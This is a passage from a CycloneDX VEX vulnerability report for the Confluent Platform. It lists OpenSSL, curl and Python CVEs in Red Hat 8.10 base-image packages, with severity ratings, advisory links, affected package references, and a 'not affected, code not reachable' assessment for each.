          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-7383",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        787
      ],
      "description": "Issue summary: A signed integer overflow when sizing the destination\nbuffer for Unicode output in ASN1_mbstring_ncopy() can lead to a heap\nbuffer overflow.\n\nImpact summary: A heap buffer overflow may lead to a crash or possibly\nattacker controlled code execution or other undefined behaviour.\n\nIn ASN1_mbstring_copy() and ASN1_mbstring_ncopy() the destination\nsize for Unicode output is computed in a signed int: by left shift\nof the input character count for BMPSTRING (UTF-16) and\nUNIVERSALSTRING (UTF-32), and by summing per-character byte counts\nfor UTF8STRING. The calculation overflows when the input reaches\naround 2^30 characters. In the worst case (UNIVERSALSTRING at 2^30\ncharacters) the size wraps to zero, OPENSSL_malloc(1) is called, and\nthe subsequent character copy writes several gigabytes past the\none-byte allocation.\n\nX.509 certificate processing routes through ASN1_STRING_set_by_NID(),\nwhose DIRSTRING_TYPE mask excludes UNIVERSALSTRING and whose per-NID\nsize limits cap the input length; no network protocol or\ncertificate-handling path in OpenSSL exercises the overflow.\nTriggering the bug requires an application that calls\nASN1_mbstring_copy() or ASN1_mbstring_ncopy() directly, or registers\na custom string type via ASN1_STRING_TABLE_add(), with\nattacker-controlled input on the order of half a gigabyte or more.\nFor these reasons this issue was assigned Low severity.\n\nThe FIPS modules in 4.0, 3.6, 3.5, 3.4 and 3.0 are not affected by\nthis issue, as the affected code is outside the OpenSSL FIPS module\nboundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-7383"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:25237"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:25239"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-7383"
        },
        {
          "url": "https://bugzilla.redhat.com/2481879"
        },
        {
          "url": "https://bugzilla.redhat.com/2481880"
        },
        {
          "url": "https://bugzilla.redhat.com/2481881"
        },
        {
          "url": "https://bugzilla.redhat.com/2481882"
        },
        {
          "url": "https://bugzilla.redhat.com/2481884"
        },
        {
          "url": "https://bugzilla.redhat.com/2481885"
        },
        {
          "url": "https://bugzilla.redhat.com/2481887"
        },
        {
          "url": "https://bugzilla.redhat.com/2481890"
        },
        {
          "url": "https://bugzilla.redhat.com/2481891"
        },
        {
          "url": "https://bugzilla.redhat.com/2481892"
        },
        {
          "url": "https://bugzilla.redhat.com/2481893"
        },
        {
          "url": "https://bugzilla.redhat.com/2481894"
        },
        {
          "url": "https://bugzilla.redhat.com/2481896"
        },
        {
          "url": "https://bugzilla.redhat.com/2481897"
        },
        {
          "url": "https://bugzilla.redhat.com/2481898"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481879"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481880"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481881"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481882"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481884"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481885"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481887"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481890"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481892"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481893"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481894"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481896"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481897"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481898"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34180"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34181"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34182"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34183"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42764"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42766"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42767"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42768"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42769"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42770"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45445"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45446"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45447"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-7383"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9076"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-25237.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:25239"
        },
        {
          "url": "https://github.com/advisories/GHSA-w853-v86g-gv7j"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/4f8d2bddaa2c8e06f9c33390ee1717059a6e4be6"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/80c15faaf78042bbb8654a0e234c50c381732f74"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/bd17511070fb39a67bfa19682affb765e706a974"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/c332adaced43bcbb85f97410597e951c11ec3083"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/d32350ae8ef7426718f5aa9e383d4b51398ee255"
        },
        {
          "url": "https://github.com/openssl/security/commit/4f8d2bddaa2c8e06f9c33390ee1717059a6e4be6"
        },
        {
          "url": "https://github.com/openssl/security/commit/80c15faaf78042bbb8654a0e234c50c381732f74"
        },
        {
          "url": "https://github.com/openssl/security/commit/bd17511070fb39a67bfa19682affb765e706a974"
        },
        {
          "url": "https://github.com/openssl/security/commit/c332adaced43bcbb85f97410597e951c11ec3083"
        },
        {
          "url": "https://github.com/openssl/security/commit/d32350ae8ef7426718f5aa9e383d4b51398ee255"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-7383.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-50379.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-7383"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260609.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8414-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8414-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-7383"
        }
      ],
      "published": "2026-06-09T17:17:50+00:00",
      "updated": "2026-07-23T08:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-8286",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        295
      ],
      "description": "A vulnerability exists where a new transfer that uses STARTTLS to upgrade the\nconnection might reuse an existing live connection even though the TLS\nconfiguration mismatches so it should not.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-8286"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55439"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-8286"
        },
        {
          "url": "https://bugzilla.redhat.com/2446448"
        },
        {
          "url": "https://bugzilla.redhat.com/2446450"
        },
        {
          "url": "https://bugzilla.redhat.com/2496758"
        },
        {
          "url": "https://bugzilla.redhat.com/2496763"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446448"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446450"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2496758"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2496763"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://curl.se/L7HzKXisfJ/CVE-2026-8286.md"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-8286.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-8286.json"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1965"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3783"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-8286"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9547"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55439.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55439"
        },
        {
          "url": "https://github.com/advisories/GHSA-32xh-3x3c-6g6h"
        },
        {
          "url": "https://hackerone.com/reports/3718195"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-8286.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55450.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8286"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8487-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-8286"
        }
      ],
      "published": "2026-07-03T07:16:24+00:00",
      "updated": "2026-07-07T19:42:11+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
